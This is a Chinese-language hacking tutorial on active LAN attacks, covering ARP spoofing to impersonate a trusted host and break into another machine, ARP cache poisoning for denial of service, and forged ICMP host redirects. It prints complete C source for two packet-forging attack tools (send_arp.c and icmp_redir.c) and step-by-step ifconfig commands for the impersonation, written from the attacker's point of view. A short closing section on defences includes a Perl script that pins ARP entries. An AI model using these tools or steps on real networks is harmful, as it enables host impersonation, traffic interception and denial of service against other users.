對于旁觀者來說，事物的缺點和優點往往是同時存在的。我很高興可以向你們顯示兩個正規的協議——arp和icmp，當你用一些特殊的方法使用它們的時候，卻得到意想不到的結果。

相對于被動攻擊（網絡監聽sniffing）來說，主動攻擊使用的并不普遍——許多管理員都擁有一個網絡監聽工具，幫助他們管理局域網。在你的LAN中，主動攻擊將會給你的生活添加光彩和樂趣。你知道，僅僅是一些技術細節使得這些角落有些昏暗不明。那么，我們去看看那里究竟有些是什么。

我們首先描述一下網絡欺騙（spoofing）和拒絕服務（DoS-deny of service）。象IP盲攻擊一樣，網絡攻擊常常非常普通并且功能強大，但是對使用者來說，需要做大量的工作（常常是猜），而且難于實行。但是ARP欺騙正好相反，它非常容易使用且方便。

一、ARP欺騙

ARP欺騙往往應用于一個內部網絡，我們可以用它來擴大一個已經存在的網絡安全漏洞。如果你可以入侵一個子網內的機器，其它的機器安全也將受到ARP欺騙的威脅。

讓我們考慮一下的網絡結構

IP        10.0.0.1  10.0.0.2  10.0.0.3  10.0.0.4
hostname   cat     rat      dog     bat
hw addr  AA:AA    BB:BB    CC:CC    DD:DD

所有的主機在以太網中以簡單的方式進行連接（沒有交換機，智能HUB）。你是cat，你具有root權限，你的目標是侵入dog。而你知道dog信任rat，所以如果你能偽裝成rat，那么你就能獲得一些意外的東西。

也許你首先想到的是，“為什么我不把我的IP設成rat的，然后...”，這種方式無法工作，無法可靠的工作。如果你將cat的IP設置成10.0.0.2，那么cat將以這個IP回答ARP請求。但是rat也會的。這樣你們就進入了一個純粹的競爭狀態，而這場比賽沒有贏家。相反的，你會輕易的輸掉這場比賽，因為許多工具會立即發現這種IP沖突的現象，抱怨之聲隨之而來。一些網絡交通分析工具還常常對它進行紀錄。在網絡管理員的日志文件中還會保留一條惡心的紀錄（cat的物理地址），這可不是你想要的。你的不到你想要的東西，并且與你的目標背道而馳。

這個東西是你想要的，一個攻擊程序——send_arp.c，一個非常有效的工具。正如它的名字所示，它發送一個ARP包（ARP回答，準確的說：由于這個協議是無狀態的，即使在沒有請求的時候也可以做出應答。請求同應答是一樣的。）向網絡上，你可以把這個包做成你想要的樣子。而你想要的只不過是可以去定制源IP與目的IP，還有硬件地址。

當你進行ARP欺騙的時候，你不希望你的網卡亂說話，那么你可以用“ifconfig eth0 -arp”關掉你的ARP協議。當然，無論如何你都需要ARP的信息，手動的構建它并使它發向內核。重要的事你要獲得你周圍人們的信任。在這個例子中，你希望dog認為rat的硬件地址是AA:AA（cat），所以你發送一個ARP應答，它的源地址是10.0.0.2,源硬件地址是AA:AA,目標地址是10.0.0.3和目標硬件地址是CC:CC?，F在，dog完全相信rat的硬件地址是AA:AA。當然dog中緩存會過期，所以它需要更新（重新發送請求）。多長時間發出請求，各個操作系統不同，但是大多來說是40秒鐘左右。經常發送ARP應答，這對你來說不會有壞處的。

對于ARP緩存處理方法的不同會帶來問題的復雜性。一些操作系統（例如Linux）會用向緩存地址發非廣播的ARP請求來要求更新緩存（就象你妻子打電話來看你在不在一樣）。這種緩存更新會給你增加麻煩，會使你剛剛偽造的ARP緩存被更改掉，所以必須避免此事發生。經常的向dog發出應答數據，這樣它就不會發出請求。正是預防為主。對于rat來說，它根本就沒有機會來改變這一切。

所以過程是簡單的。首先來設置網絡接口別名（ifconfig eth0:1 10.0.0.2），添加rat的IP地址并且打開ARP協議（ifconfig eth0 arp）——你需要設置你的ARP緩存，當沒有ARP時，它不會工作。然后在正確的網絡接口上設置到dog的路由。再設置dog的ARP緩存。最后，關掉網絡接口的ARP功能。這樣一切就OK了。

現在，當你用send_arp將毒液注入之后（dog和rat），那么，dog就會認為，你就是rat。一定要記住，要持續不斷的向dog和rat發出ARP包。這種攻擊方式就僅僅工作在局域網內（通常的，ARP包是不會路由的）。一個有趣的嘗試是，把我們上述試驗中dog替換成路由器，如果可以實現的話（我不確定它是否會永遠成立，路由器的ARP功能不是那么容易欺騙的），你可以輕易的冒充這個局域網內的機器去欺騙這個Internet世界了。所以目標可以是任何一臺機器，但是你要偽裝的機器，必須是這個局域網內的。除了欺騙以外，你還可以用ARP作很多事。藍天之下，皆可任你遨游?；蛘?，DoS也是一個非常有用的程序。

給rat一個錯誤的硬件地址，是一個非常有效的讓它閉嘴的方法。你可以避免它向一些特殊的機器發出請求（一個ARP緩沖池通?？梢匀堇ㄕ麄€網絡的內容，所以你可以在一段時間內有效的防止它向其它機器發出請求）。非常明顯目標也可以是一臺路由器。干擾緩存需要兩步：攪亂被偽裝的機器和你不希望它與之通訊的機器。這種方法不是常常奏效，當這臺機器發現緩存中沒有目標機器時，會主動發出ARP請求。

當然你的下一滴毒液會迅速注入，但是你需要經常維持這種狀態。一個比較有效的方法是，給rat一個錯誤的dog硬件地址，這樣rat既能保持正常的工作狀態，又不會干擾你的活動。同樣的，這種方法也依賴于不同的環境，通常的情況是rat會經常的向錯誤的目標發出各種不同的包，目標會返回ICMP不可抵達信息，從而用一種不正當的方式維持了連接。這種偽裝的連接可以推遲緩存的更新時間。在Linux上，我們可以是更新時間從1分鐘提升到10分鐘。在這一段時間內，你已經可以完成一個TCP連接可以完成的大多數事情了。

這里存在一個有趣被稱為“無理ARP”。在這個ARP請求包中，源IP與目的IP是相同的，通常它是經過以太網廣播進行發送。一些執行程序認為這是一種特殊情況——系統發出的自身更新信息，并且將這個請求添加在自己的緩存中。這種方式里，影響的是整個網絡。這是毋庸置疑的，但這并不是ARP協議的一部分，而是由執行者決定是否作（或是不作），這漸漸的變得不受人歡迎。

ARP也可以用來開一些非常專業的笑話。假想一下某人設置了一個中繼器或者是一個管道，僅僅是利用自己的機器去騙取兩臺相鄰機器的信任，并且把通訊的包都發給這臺機器。如果這臺機器僅僅是轉發數據，那么誰也不會發現。但是當它僅僅作一些很少的改動時，就會給你添加非常大的麻煩。例如，隨機的更改數據包中的幾位，這樣就會造成校驗和錯誤。數據流好像是毫發無損，卻會毫無原因的出現不可預料的錯誤。

二、ICMP重定向

另外一個比較有效的并且類似與ARP欺騙的手段是利用另外一個正常的協議——ICMP重定向。這種重定向通常是由你的默認路由器發來的，通告你有一個到達某一網絡的更近的路由。最初，既可以通告網絡重定向，也可以通告主機的重定向，但是現在，由于網絡重定向被否決，僅剩下了主機重定向。正確的制作一個經過完整檢查的ICMP包（必須由默認路由器發來，發向重定向機器，新的路由應該是一個網絡的直接連接等等），接收者會對系統的路由表進行更新。

這是ICMP的安全問題。偽裝一個路由器的IP地址是簡單的，icmp_redir.c正是作的這個工作。RFC聲明系統必須遵循這個重定向，除非你是路由器。實際上幾乎所有的系統都支持這一點（除了vanilla Linux 2.0.30）。

ICMP重定向提供了一個非常有力的DoS工具。不像ARP緩存更新，路由表不存在的過期問題。并且不需要在本地網絡，你可以發起攻擊從任何地方。所以當目標接受了ICMP重定向之后（包確切抵達），目標就不會再和網絡上的一些機器進行通訊（是的，并不是所有的機器，但是一些與目標機器不在同一個網絡上的機器）。域名服務器會是一個非常好的攻擊目標。

/* send_arp.c
    這個程序發送ARP包，由使用者提供源/目的IP和網卡地址。編譯并運行在Linux環境下，
也可以運行在其它的有SOCK_PACKET的Unix系統上。
    這個程序是對上述理論的驗證，僅此而已。
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2

#define DEFAULT_DEVICE "eth0"

char usage[]={"send_arp: sends out custom ARP packet.\n
\tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"};

struct arp_packet {
    u_char targ_hw_addr[ETH_HW_ADDR_LEN];
    u_char src_hw_addr[ETH_HW_ADDR_LEN];
    u_short frame_type;
    u_short hw_type;
    u_short prot_type;
    u_char hw_addr_size;
    u_char prot_addr_size;
    u_short op;
    u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
    u_char sndr_ip_addr[IP_ADDR_LEN];
    u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
    u_char rcpt_ip_addr[IP_ADDR_LEN];
    u_char padding[18];
};

void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);

int main(int argc,char** argv){

struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;

if(argc != 5)die(usage);

sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
    perror("socket");
    exit(1);
    }

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);

get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);

get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);

memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);

bzero(pkt.padding,18);

strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
    perror("sendto");
    exit(1);
    }
exit(0);
}

void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}

void get_ip_addr(struct in_addr* in_addr,char* str){

struct hostent *hostp;

in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
    if( (hostp = gethostbyname(str)))
        bcopy(hostp->h_addr,in_addr,hostp->h_length);
    else {
        fprintf(stderr,"send_arp: unknown host %s\n",str);
        exit(1);
        }
    }
}

void get_hw_addr(char* buf,char* str){

int i;
char c,val;

for(i=0;i    if( !(c = tolower(*str++))) die("Invalid hardware address");
    if(isdigit(c)) val = c-'0';
    else if(c >= 'a' && c <= 'f') val = c-'a'+10;
    else die("Invalid hardware address");

    *buf = val << 4;
    if( !(c = tolower(*str++))) die("Invalid hardware address");
    if(isdigit(c)) val = c-'0';
    else if(c >= 'a' && c <= 'f') val = c-'a'+10;
    else die("Invalid hardware address");

    *buf++ |= val;

    if(*str == ':')str++;
    }
}

/* icmp_redir.c
    本程序由用戶提供的網關地址發送了一個ICMP主機重定向數據包。在Linux2.0.30上測試通過，并且對大多數的Unix機器有效。
    這個程序是對上述理論的驗證，僅此而已。
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IPVERSION 4

struct raw_pkt {
    struct iphdr ip; /* This is Linux-style iphdr.
                Use BSD-style struct ip if you want */
    struct icmphdr icmp;
    struct iphdr encl_iphdr;
    char encl_ip_data[8];
};

struct raw_pkt* pkt;

void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);

int main(int argc,char** argv){

struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet.
yuri volobuev'97\n
\tusage: icmp_redir gw_host targ_host dst_host dummy_host\n"};
char on = 1;

if(argc != 5)die(usage);

if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
    perror("socket");
    exit(1);
    }

sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;

packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);

pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));

pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);

memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
    sizeof(struct iphdr));

pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
    sizeof(struct raw_pkt)-sizeof(struct iphdr));

if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
    perror("setsockopt: IP_HDRINCL");
    exit(1);
    }

if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
    perror("sendto");
    exit(1);
    }
exit(0);
}

void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}

unsigned long int get_ip_addr(char* str){

struct hostent *hostp;
unsigned long int addr;

if( (addr = inet_addr(str)) == -1){
    if( (hostp = gethostbyname(str)))
        return *(unsigned long int*)(hostp->h_addr);
    else {
        fprintf(stderr,"unknown host %s\n",str);
        exit(1);
        }
    }
return addr;
}

unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;

while(len > 1){
    sum += *addr++;
    len -= 2;
    }
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);

return ~sum;
}

三、解決方案

對于大多數人來說，ARP是一個隱藏的底層協議。你可以時不時的觀察它，但是平常不會有人對它發生興趣。你可以用arp命令來檢查你的ARP緩存，但是當一個網絡出現問題的時候，這個并不是我們首先想到的。Windows也存在這個命令，記住這一點也許對你有幫助。但是當一個ARP欺騙通過網關從另一個網絡發向你時，恐怕你也無能為力了。同樣的，你也可以在你的路由表中發現重定向的路由信息（route 命令，用“D”標志來標明）。

ARP攻擊設計來攻擊10Base2以太網。如果網絡已一些比較先進的方式進行連接，通常是智能HUB或交換機，那么攻擊就很容易被發現，甚至是不可能的（類似于被動攻擊）。所以這是一個向你的老板要求更新網絡設備的理由。

這么想起來，ICMP重定向真是一個非常瘋狂的想法。首先，一些網絡的結構非常簡單，對路由表不需要任何添加；其次，大多數的穩定的網絡上，僅僅是用手動的辦法來更新路由。這并不是一個經常更新的工作，為什么要通過ICMP呢？最后，這個對于你來說是非常危險的，你可以在你的系統上關閉ICMP重定向，這樣可以減少同RFC1122的沖突。哎，這可不容易呀！在Linux這種提供源碼的機器上，你可以重新編譯內核。在Irix 6.2和一些其它的系統上，可以“set icmp_dropredirects=1”。這與其它的OS，我也不知道有什么辦法。

時間證明了這個真理：不要信任未確認的主機。否則，網絡上帝不會對你施予憐憫的。 一些人認為“我有防火墻，我怕誰”，認為一些安全問題對它來說無關緊要。我承認防火墻的作用，但是這并不是經常有效。

想象這樣一個環境，所有的機器都直接與Internet相連，你不得不與你不了解的人共用你的內部網，他們使用的是vanilla SGI 的機器，而他們簡直是在到處告訴別人“來攻擊我吧，我的買主使它非常簡單”（是這樣的，那些人認識Unix，從侏羅紀公園...），另外，通向你的路由器由別的機構控制。讓我們來到一個標準的網絡環境，它會提供我們安全，不受外部的攻擊。人們在這里工作，使用電腦。同樣，這里的每臺機器也存在安全問題。所以，當你下一次提到防火墻的時候，請記住它并不能保護每一個人。

John Goerzen提供了一個Perl腳本，可以在系統啟動時運行。它主要是在Linux機器中維持一個已知的IP地址與硬件地址的緩存，設置標志，以使其不會被更新和改變。配置文件非常簡單——IP addr 配 MAC addr，用空格鍵分割，“#”作為注釋。

這個腳本僅僅在Linux機器上測試過——在其它平臺上的人需要修改arp命令的格式。

注意：腳本需要運行在網絡接口啟動之后，服務和客戶運行之前；另外，一些人會在ARP被鎖定時竊取連接。以下是它的腳本：

#!/usr/bin/perl
# Program: forcehwaddr
# Program to run ARP to force certain tables.

# Specify filenames to read from on command line, or read from stdin.

foreach (<>) { # For each input line....
chomp; # Strip if CR/LF
if (/^#/) { next; } # If it's a comment, skip it.
if (((($host, $hw) = /\s*(.+?)\s+(\S+)\s*/) == 2) &&
    !(/^#/)) {
    # The text between the slashes parses the input line as follows:
    # Ignore leading whitespace. (\s*)
    # Then, start matching and put it into $host ($host, (.+?))
    # Skip over the whitespace after that (\s+)
    # Start matching. Continue matching until end of line or optional
    # trailing whitespace.

    # Then, the if checks to see that both a
    # host and a hardware address were matched.
    # (2 matches). If not, we skip the
    # line (assuming it is blank or invalid or something).
    # The second part of the if checks to see if the line starts with
    # a pound sign; if so, ignore it (as a comment).

    # Otherwise, run the appropriate command:
    printf("Setting IP %-15s to hardware address %s\n", $host, $hw);
    system "/usr/sbin/arp -s $host $hw\n";
}
}